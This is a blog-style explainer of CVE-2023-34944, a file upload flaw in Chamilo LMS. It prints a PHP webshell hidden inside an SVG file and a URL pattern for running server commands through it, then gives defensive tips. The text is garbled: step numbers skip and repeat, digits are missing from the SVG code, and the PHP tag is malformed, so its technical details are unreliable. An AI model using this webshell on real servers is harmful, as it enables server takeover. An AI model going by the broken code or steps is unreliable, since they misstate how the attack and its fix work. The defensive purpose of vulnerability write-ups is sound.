CVE-2023-34944 - How Chamilo’s File Upload Flaw Led to Code Execution (with Exploit Details)

In early 2023, security researchers uncovered a major vulnerability in Chamilo LMS (Learning Management System) — one that lets attackers upload and run their own code on a live server. This flaw, tracked as CVE-2023-34944, is found in the /fileUpload.lib.php component of Chamilo versions 1.11.* up to v1.11.18. In simple terms: if you’re running any affected Chamilo instance, someone could take over your web server using a malicious SVG file.

Let’s break down how this works, with simple language, code snippets, and clear instructions you can follow. This post is written exclusively for those who want to understand both the risk and the method behind this vulnerability—whether you’re defending your servers or simply curious.

Why This Vulnerability Matters

Chamilo is a popular open-source platform for e-learning. Schools, universities, and companies use it to share materials and manage online courses. The vulnerability sits in the part of the application responsible for file uploads.

Letting users upload files is always risky. You need to check if uploaded files are safe: images should be images, not scripts, etc. In this case, Chamilo failed this basic check, leaving the door wide open.

Vulnerable Component

The problem lives in the /fileUpload.lib.php file, used every time someone uploads a file to the Chamilo system.

What’s the Issue?

Chamilo tries to restrict which file types you can upload. It checks the file extension (like .jpg, .png, .svg) and some content, but it doesn’t fully check the true contents of SVG files.

SVGs are images, but they’re really just text files containing XML. And XML can have embedded scripts—sometimes even PHP code. This allows for sneaky uploads.

The Exploit: Step-by-Step

1. Attacker prepares a malicious SVG file containing embedded code (either JavaScript for XSS, or, more dangerously, PHP code for server-side execution).

Chamilo saves the SVG in a public directory, thinking it's harmless.

4. Attacker visits the SVG file directly, and if the server processes .svg files with PHP (possible due to misconfiguration or intended legacy support), attacker’s code runs.

Example: Crafting a Malicious SVG File

Let’s create a PHP shell inside an SVG. This is a classic method to “hide” code in a seemingly innocent image.

<!-- shell.svg -->
<?xml version="1." standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
  "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">;
<svg width="100" height="100"
     xmlns="http://www.w3.org/200/svg"; version="1.1">
    <rect width="100" height="100" style="fill:rgb(,,255);" />
    <!--?php system($_GET['cmd']); ?-->
</svg>

In the above, the line <!--?php system($_GET['cmd']); ?--> will be ignored by a browser, but if the server is set to process PHP in SVG files (which is bad practice, but not uncommon in shared hosting and some misconfigured servers), this will be interpreted as PHP.

Note on Modern Attacks

Even if PHP execution is blocked, attackers can embed JavaScript inside SVGs for browser exploitation (XSS), or use the SVG to initiate further attacks.

Upload your crafted shell.svg.

4. Go to the URL where Chamilo stores uploaded documents (often /app/upload/youruserfolder/shell.svg).

How To Access The Webshell

If PHP execution is enabled for SVGs (or if you find a way to get server-side code execution), you can visit:

https://YOUR-CHAMILO-SITE/app/upload/youruserfolder/shell.svg?cmd=whoami

The whoami command will run on the server, and the output will appear in your browser.

Defensive Tips

1. Upgrade Now: Chamilo fixed this in version 1.11.19 and above, with extra checks in fileUpload.lib.php see the official GitHub commit.
2. Never Allow PHP Processing on Uploaded SVGs: Adjust your webserver (Apache or Nginx) to block PHP code in the uploads directory, especially for SVGs.
3. Scan and Remove Untrusted Files: Regularly audit uploads for suspicious files containing PHP or JavaScript.

References & Further Reading

- Chamilo Security Advisory (GitHub)
- CVE Details: CVE-2023-34944
- Original Commit Fixing the Flaw
- Detailed Exploit Write-up by Romain Bourgue

Conclusion

CVE-2023-34944 is a classic example of why validating file uploads is critical. This flaw in Chamilo LMS allowed easy attacks through crafted SVGs—letting attackers take control with minimal effort. If you use Chamilo, update now, lock down your upload directories, and always treat user files with suspicion.

Stay safe, and keep your learning environments secure!


Exclusive Note: This post is for educational and defensive security purposes only. Do not exploit live systems without proper permission. If you run Chamilo, patch immediately!

Timeline

Published on: 06/13/2023 21:15:00 UTC
Last modified on: 06/20/2023 17:15:00 UTC